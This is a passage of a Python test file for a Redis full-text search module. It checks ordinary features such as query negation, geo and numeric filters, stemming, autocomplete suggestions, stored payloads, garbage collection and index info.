env.assertTrue(s2.intersection(s1) == set())
env.assertTrue(s3.intersection(s1) == set())
env.assertTrue(s4.intersection(s1) == set())
# NOT on a non existing term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -dasdfasdf', 'nocontent')[0], N)
# not on env term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -constant', 'nocontent'), [0])
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -(term0|term1|term2|term3|term4|nothing)', 'nocontent'), [0])
# env.assertEqual(r.execute_command('ft.search', 'idx', 'constant -(term1 term2)', 'nocontent')[0], N)
def testNestedIntersection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'a', 'text', 'b', 'text', 'c', 'text', 'd', 'text'))
for i in range(20):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'a', 'foo', 'b', 'bar', 'c', 'baz', 'd', 'gaz'))
res = [
r.execute_command('ft.search', 'idx',
'foo bar baz gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@a:foo @b:bar @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@b:bar @a:foo @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@c:baz @b:bar @a:foo @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@d:gaz @c:baz @b:bar @a:foo', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@a:foo (@b:bar (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@c:baz (@a:foo (@b:bar (@c:baz @d:gaz)))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@b:bar (@a:foo (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@d:gaz (@a:foo (@c:baz @b:bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar baz gaz)', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (baz gaz))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (foo bar) (foo bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (foo (bar baz (gaz)))', 'nocontent'),
r.execute_command('ft.search', 'idx', 'foo (foo (bar (baz (gaz (foo bar (gaz))))))', 'nocontent')]
for i, r in enumerate(res):
# print i, res[0], r
env.assertListEqual(res[0], r)
def testInKeys(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(200):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world'))
for _ in r.retry_with_rdb_reload():
for keys in (
['doc%d' % i for i in range(10)], ['doc%d' % i for i in range(0, 30, 2)], [
'doc%d' % i for i in range(99, 0, -5)]
):
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', len(keys), *keys)
env.assertEqual(len(keys), res[0])
env.assertTrue(all((k in res for k in keys)))
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', 3, 'foo', 'bar', 'baz')[0])
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', 99)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', -1)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'inkeys', 4, 'foo')
def testSlopInOrder(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 't1 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1, 'fields',
'title', 't1 t3 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3', 1, 'fields',
'title', 't1 t3 t4 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc4', 1, 'fields',
'title', 't1 t3 t4 t5 t2'))
res = r.execute_command(
'ft.search', 'idx', 't1|t4 t3|t2', 'slop', '0', 'inorder', 'nocontent')
env.assertEqual({'doc3', 'doc4', 'doc2', 'doc1'}, set(res[1:]))
res = r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'inorder')[0])
env.assertEqual(1, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '0', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '1', 'inorder')[0])
env.assertEqual(3, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '2', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '3', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'inorder')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't t1', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4', 'inorder')[0])
def testExact(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
res = r.execute_command(
'ft.search', 'idx', '"hello world"', 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', "hello \"another world\"", 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testGeo(env):
r = env
gsearch = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', query, 'geofilter', 'location', lon, lat, dist, unit)
gsearch_inline = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', '{} @location:[{} {} {} {}]'.format(query, lon, lat, dist, unit))
env.assertOk(r.execute_command('ft.create', 'idx',
'schema', 'name', 'text', 'location', 'geo'))
for i, hotel in enumerate(hotels):
env.assertOk(r.execute_command('ft.add', 'idx', 'hotel{}'.format(i), 1.0, 'fields', 'name',
hotel[0], 'location', '{},{}'.format(hotel[2], hotel[1])))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hilton')
env.assertEqual(len(hotels), res[0])
res = gsearch('hilton', "-0.1757", "51.5156", '1')
print res
env.assertEqual(3, res[0])
env.assertEqual('hotel2', res[5])
env.assertEqual('hotel21', res[3])
env.assertEqual('hotel79', res[1])
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '1')
env.assertListEqual(res, res2)
res = gsearch('hilton', "-0.1757", "51.5156", '10')
env.assertEqual(14, res[0])
env.assertEqual('hotel93', res[1])
env.assertEqual('hotel92', res[3])
env.assertEqual('hotel79', res[5])
res2 = gsearch('hilton', "-0.1757", "51.5156", '10000', 'm')
env.assertListEqual(res, res2)
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '10')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'm')
env.assertEqual(1, res[0])
env.assertEqual('hotel94', res[1])
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'm')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'km')
env.assertEqual(5, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'km')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '5', 'km')
env.assertEqual(3, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '5', 'km')
env.assertListEqual(res, res2)
def testGeoDeletion(env):
if env.is_cluster():
raise unittest.SkipTest()
# Can't properly test if deleted on cluster
env.cmd('ft.create', 'idx', 'schema',
'g1', 'geo', 'g2', 'geo', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'g1', "-0.1757,51.5156",
'g2', "-0.1757,51.5156",
't1', "hello")
# keys are: "geo:idx/g1" and "geo:idx/g2"
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(2, env.cmd('zcard', 'geo:idx/g2'))
# Remove the first doc
env.cmd('ft.del', 'idx', 'doc1')
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(1, env.cmd('zcard', 'geo:idx/g2'))
# Replace the other one:
env.cmd('ft.add', 'idx', 'doc2', 1.0,
'replace', 'fields',
't1', 'just text here')
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g1'))
env.assertEqual(0, env.cmd('zcard', 'geo:idx/g2'))
def testAddHash(env):
if env.is_cluster():
raise unittest.SkipTest()
r = env
env.assertOk(r.execute_command('ft.create', 'idx', 'schema',
'title', 'text', 'weight', 10.0, 'body', 'text', 'price', 'numeric'))
env.assertTrue(
r.hmset('doc1', {"title": "hello world", "body": "lorem ipsum", "price": 2}))
env.assertTrue(
r.hmset('doc2', {"title": "hello werld", "body": "lorem ipsum", "price": 5}))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc1', 1.0))
env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc2', 1.0))
res = r.execute_command('ft.search', 'idx', "hello", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc1", res[2])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx',
"hello",
"filter", "price", "0", "3"
)
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
env.assertListEqual(
['body', 'lorem ipsum', 'price', '2', 'title', 'hello world'], res[2])
res = r.execute_command(
'ft.search', 'idx', "hello werld", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testInfields(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text', 'weight', 1.0))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello world lorem ipsum',
'body', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', 'hello', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"hello world\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
res = r.execute_command(
'ft.search', 'idx', '\"lorem ipsum\"', 'verbatim', "infields", 1, "body", "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', "infields", 2, "body", "title", "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
env.assertEqual("doc2", res[1])
env.assertEqual("doc1", res[2])
def testScorerSelection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
# this is the default scorer
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'TFIDF')
env.assertEqual(res, [0])
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'foo', 'scorer', 'NOSUCHSCORER')
def testFieldSelectors(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'TiTle', 'text', 'BoDy', 'text', "ืืื ืืงืื", 'text', 'field.with,punct', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 'hello world', 'body', 'foo bar', 'ืืื ืืงืื', 'unicode', 'field.with,punct', 'punt'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 0.5, 'fields',
'body', 'hello world', 'title', 'foo bar', 'ืืื ืืงืื', 'unicode', 'field.with,punct', 'punt'))
res = r.execute_command(
'ft.search', 'idx', '@title:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc1'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world', 'nocontent')
env.assertEqual(res, [1, 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:hello @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@body:hello world @title:world', 'nocontent')
env.assertEqual(res, [0])
res = r.execute_command(
'ft.search', 'idx', '@BoDy:(hello|foo) @Title:(world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body:(hello|foo world|bar)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@body|title:(hello world)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@ืืื ืืงืื:(unicode)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
res = r.execute_command(
'ft.search', 'idx', '@field\\.with\\,punct:(punt)', 'nocontent')
env.assertEqual(res, [2, 'doc1', 'doc2'])
def testStemming(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello kitties'))
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent")
env.assertEqual(3, len(res))
env.assertEqual(2, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "verbatim")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
# test for unknown language
with env.assertResponseError():
res = r.execute_command(
'ft.search', 'idx', 'hello kitty', "nocontent", "language", "foofoofian")
def testExpander(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello kitty'))
res = r.execute_command(
'ft.search', 'idx', 'kitties',
"nocontent",
"expander", "SBSTEM"
)
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitties', "nocontent", "expander", "noexpander")
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent")
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
res = r.execute_command(
'ft.search', 'idx', 'kitti', "nocontent", 'verbatim')
env.assertEqual(1, len(res))
env.assertEqual(0, res[0])
# Calling a stem directly works even with VERBATIM.
# You need to use the + prefix escaped
res = r.execute_command(
'ft.search', 'idx', '\\+kitti', "nocontent", 'verbatim')
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
def testNumericRange(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'score', 'numeric', 'price', 'numeric'))
for i in xrange(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'fields',
'title', 'hello kitty', 'score', i, 'price', 100 + 10 * i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 100)
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 50)
env.assertEqual(51, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', 'verbatim', "nocontent", "limit", 0, 100,
"filter", "score", "(0", "(50")
env.assertEqual(49, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", "-inf", "+inf")
env.assertEqual(100, res[0])
# test multi filters
scrange = (19, 90)
prrange = (290, 385)
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", scrange[
0], scrange[1],
"filter", "price", prrange[0], prrange[1])
# print res
for doc in res[2::2]:
sc = int(doc[doc.index('score') + 1])
pr = int(doc[doc.index('price') + 1])
env.assertTrue(sc >= scrange[0] and sc <= scrange[1])
env.assertGreaterEqual(pr, prrange[0])
env.assertLessEqual(pr, prrange[1])
env.assertEqual(10, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", "19", "90",
"filter", "price", "90", "185")
env.assertEqual(0, res[0])
# Test numeric ranges as part of query syntax
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 100]', "nocontent")
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 50]', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', '@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty -@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[-inf +inf]', "nocontent")
env.assertEqual(100, res[0])
def testSuggestions(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1))
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'INCR'))
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertEqual(1, len(res))
env.assertEqual("hello world", res[0])
terms = ["hello werld", "hallo world",
"yellow world", "wazzup", "herp", "derp"]
sz = 2
for term in terms:
env.assertEqual(sz, r.execute_command(
'ft.SUGADD', 'ac', term, sz - 1))
sz += 1
for _ in r.retry_with_rdb_reload():
env.assertEqual(7, r.execute_command('ft.SUGLEN', 'ac'))
# search not fuzzy
env.assertEqual(["hello world", "hello werld"],
r.execute_command("ft.SUGGET", "ac", "hello"))
# print r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1", "WITHSCORES")
# search fuzzy - shuold yield more results
env.assertEqual(['hello world', 'hello werld', 'yellow world', 'hallo world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY"))
# search fuzzy with limit of 1
env.assertEqual(['hello world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1"))
# scores should return on WITHSCORES
rc = r.execute_command(
"ft.SUGGET", "ac", "hello", "WITHSCORES")
env.assertEqual(4, len(rc))
env.assertTrue(float(rc[1]) > 0)
env.assertTrue(float(rc[3]) > 0)
rc = r.execute_command("ft.SUGDEL", "ac", "hello world")
env.assertEqual(1L, rc)
rc = r.execute_command("ft.SUGDEL", "ac", "world")
env.assertEqual(0L, rc)
rc = r.execute_command("ft.SUGGET", "ac", "hello")
env.assertEqual(['hello werld'], rc)
def testSuggestPayload(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'PAYLOAD', 'foo'))
env.assertEqual(2, r.execute_command(
'ft.SUGADD', 'ac', 'hello werld', 1, 'PAYLOAD', 'bar'))
env.assertEqual(3, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload', 1, 'PAYLOAD', ''))
env.assertEqual(4, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload2', 1))
res = r.execute_command("FT.SUGGET", "ac", "hello", 'WITHPAYLOADS')
env.assertListEqual(['hello world', 'foo', 'hello werld', 'bar', 'hello nopayload', None, 'hello nopayload2', None],
res)
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertListEqual(['hello world', 'hello werld', 'hello nopayload', 'hello nopayload2'],
res)
res = r.execute_command(
"FT.SUGGET", "ac", "hello", 'WITHPAYLOADS', 'WITHSCORES')
# we don't compare the scores beause they may change
env.assertEqual(12, len(res))
def testPayload(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(10):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1.0,
'payload', 'payload %d' % i,
'fields', 'f', 'hello world'))
for x in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(21, len(res))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'withpayloads')
env.assertEqual(31, len(res))
env.assertEqual(10, res[0])
for i in range(1, 30, 3):
env.assertEqual(res[i + 1], 'payload %s' % res[i])
def testGarbageCollector(env):
env.skipOnCluster()
if env.moduleArgs is not None and 'GC_POLICY FORK' in env.moduleArgs:
# this test is not relevent for fork gc cause its not cleaning the last block
raise unittest.SkipTest()
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0,
'fields', 'foo', ' '.join(('term%d' % random.randrange(0, 10) for i in range(10)))))
def get_stats(r):
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
gc_stats = {d['gc_stats'][x]: float(
d['gc_stats'][x + 1]) for x in range(0, len(d['gc_stats']), 2)}
d['gc_stats'] = gc_stats
return d
stats = get_stats(r)
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 8)
env.assertEqual(0, stats['gc_stats']['bytes_collected'])
env.assertGreater(int(stats['num_records']), 0)
initialIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
for i in range(N):
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in range(100):
# gc is random so we need to do it long enough times for it to work
env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')
stats = get_stats(r)
env.assertEqual(0, int(stats['num_docs']))
env.assertEqual(0, int(stats['num_records']))
if not env.is_cluster():
env.assertEqual(100, int(stats['max_doc_id']))
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 30)
currentIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
# print initialIndexSize, currentIndexSize,
# stats['gc_stats']['bytes_collected']
env.assertGreater(initialIndexSize, currentIndexSize)
env.assertGreater(stats['gc_stats'][
'bytes_collected'], currentIndexSize)
for i in range(10):
res = r.execute_command('ft.search', 'idx', 'term%d' % i)
env.assertEqual([0], res)
def testReturning(env):
env.assertCmdOk('ft.create', 'idx', 'schema',
'f1', 'text',
'f2', 'text',
'n1', 'numeric', 'sortable',
'f3', 'text')
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'DOC_{0}'.format(i), 1.0, 'fields',
'f2', 'val2', 'f1', 'val1', 'f3', 'val3',
'n1', i)
# RETURN 0. Simplest case
for x in env.retry_with_reload():
res = env.cmd('ft.search', 'idx', 'val*', 'return', '0')
env.assertEqual(11, len(res))
env.assertEqual(10, res[0])
for r in res[1:]:
env.assertTrue(r.startswith('DOC_'))
for field in ('f1', 'f2', 'f3', 'n1'):
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, field)
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
for pair in grouper(res[1:], 2):
docname, fields = pair
env.assertEqual(2, len(fields))
env.assertEqual(field, fields[0])
env.assertTrue(docname.startswith('DOC_'))
# Test that we don't return SORTBY fields if they weren't specified
# also in RETURN
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'f1',
'sortby', 'n1', 'ASC')
row = res[2]
# get the first result
env.assertEqual(['f1', 'val1'], row)
# Test when field is not found
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'nonexist')
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
# # Test that we don't crash if we're given the wrong number of fields
with env.assertResponseError():
res = env.cmd('ft.search', 'idx', 'val*', 'return', 700, 'nonexist')
def _test_create_options_real(env, *options):
options = [x for x in options if x]
has_offsets = 'NOOFFSETS' not in options
has_fields = 'NOFIELDS' not in options
has_freqs = 'NOFREQS' not in options
try:
env.cmd('ft.drop', 'idx')
except:
pass
options = ['idx'] + options + ['schema', 'f1', 'text', 'f2', 'text']
env.assertCmdOk('ft.create', *options)
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'doc{}'.format(
i), 0.5, 'fields', 'f1', 'value for {}'.format(i))
# Query
# res = env.cmd('ft.search', 'idx', "value for 3")
# if not has_offsets:
# env.assertIsNone(res)
# else:
# env.assertIsNotNone(res)
# Frequencies:
env.assertCmdOk('ft.add', 'idx', 'doc100',
1.0, 'fields', 'f1', 'foo bar')
env.assertCmdOk('ft.add', 'idx', 'doc200', 1.0,
'fields', 'f1', ('foo ' * 10) + ' bar')
res = env.cmd('ft.search', 'idx', 'foo')
env.assertEqual(2, res[0])
if has_offsets:
docname = res[1]
if has_freqs:
env.assertEqual('doc200', docname)
else:
env.assertEqual('doc100', docname)
env.assertCmdOk('ft.add', 'idx', 'doc300',
1.0, 'fields', 'f1', 'Hello')
res = env.cmd('ft.search', 'idx', '@f2:Hello')
if has_fields:
env.assertEqual(1, len(res))
else:
env.assertEqual(3, len(res))
def testCreationOptions(env):
from itertools import combinations
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
_test_create_options_real(env, *combo)
def testInfoCommand(env):
from itertools import combinations
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'NOFIELDS', 'schema', 'title', 'text'))
N = 50
for i in xrange(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'replace', 'fields',
'title', 'hello term%d' % i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['index_name'], 'idx')
env.assertEqual(d['index_options'], ['NOFIELDS'])
env.assertListEqual(
d['fields'], [['title', 'type', 'TEXT', 'WEIGHT', '1']])
if not env.is_cluster():
env.assertEquals(int(d['num_docs']), N)
env.assertEquals(int(d['num_terms']), N + 1)
env.assertEquals(int(d['max_doc_id']), N)
env.assertEquals(int(d['records_per_doc_avg']), 2)
env.assertEquals(int(d['num_records']), N * 2)
env.assertGreater(float(d['offset_vectors_sz_mb']), 0)
env.assertGreater(float(d['key_table_size_mb']), 0)
env.assertGreater(float(d['inverted_sz_mb']), 0)
env.assertGreater(float(d['bytes_per_record_avg']), 0)
env.assertGreater(float(d['doc_table_size_mb']), 0)
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
combo = list(filter(None, combo))
options = combo + ['schema', 'f1', 'text']
try:
env.cmd('ft.drop', 'idx')
except:
pass
env.assertCmdOk('ft.create', 'idx', *options)
info = env.cmd('ft.info', 'idx')
ix = info.index('index_options')
env.assertFalse(ix == -1)
opts = info[ix + 1]
# make sure that an empty opts string returns no options in
# info
if not combo:
env.assertListEqual([], opts)
for option in filter(None, combo):
env.assertTrue(option in opts)
def testNoStem(env):
env.cmd('ft.create', 'idx', 'schema', 'body',
'text', 'name', 'text', 'nostem')
for _ in env.retry_with_reload():
try:
env.cmd('ft.del', 'idx', 'doc')
except redis.ResponseError:
pass
# Insert a document
env.assertCmdOk('ft.add', 'idx', 'doc', 1.0, 'fields',
'body', "located",
'name', "located")
# Now search for the fields
res_body = env.cmd('ft.search', 'idx', '@body:location')
res_name = env.cmd('ft.search', 'idx', '@name:location')
env.assertEqual(0, res_name[0])
env.assertEqual(1, res_body[0])
def testSearchNonexistField(env):
# GH Issue 133
env.cmd('ft.create', 'idx', 'schema', 'title', 'text',
'weight', 5.0, 'body', 'text', 'url', 'text')
env.cmd('ft.add', 'idx', 'd1', 1.0, 'nosave', 'fields', 'title',
'hello world', 'body', 'lorem dipsum', 'place', '-77.0366 38.8977')
env.cmd('ft.search', 'idx', 'Foo', 'GEOFILTER',
'place', '-77.0366', '38.8977', '1', 'km')
def testSortbyMissingField(env):
# GH Issue 131
env.cmd('ft.create', 'ix', 'schema', 'txt',
'text', 'num', 'numeric', 'sortable')
env.cmd('ft.add', 'ix', 'doc1', 1.0, 'fields', 'txt', 'foo')
env.cmd('ft.search', 'ix', 'foo', 'sortby', 'num')
def testParallelIndexing(env):
# GH Issue 207
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
from threading import Thread
env.getConnection()
ndocs = 100
def runner(tid):
cli = env.getConnection()
for num in range(ndocs):
cli.execute_command('ft.add', 'idx', 'doc{}_{}'.format(tid, num), 1.0,
'fields', 'txt', 'hello world' * 20)
ths = []
for tid in range(10):
ths.append(Thread(target=runner, args=(tid,)))
[th.start() for th in ths]
[th.join() for th in ths]
res = env.cmd('ft.info', 'idx')
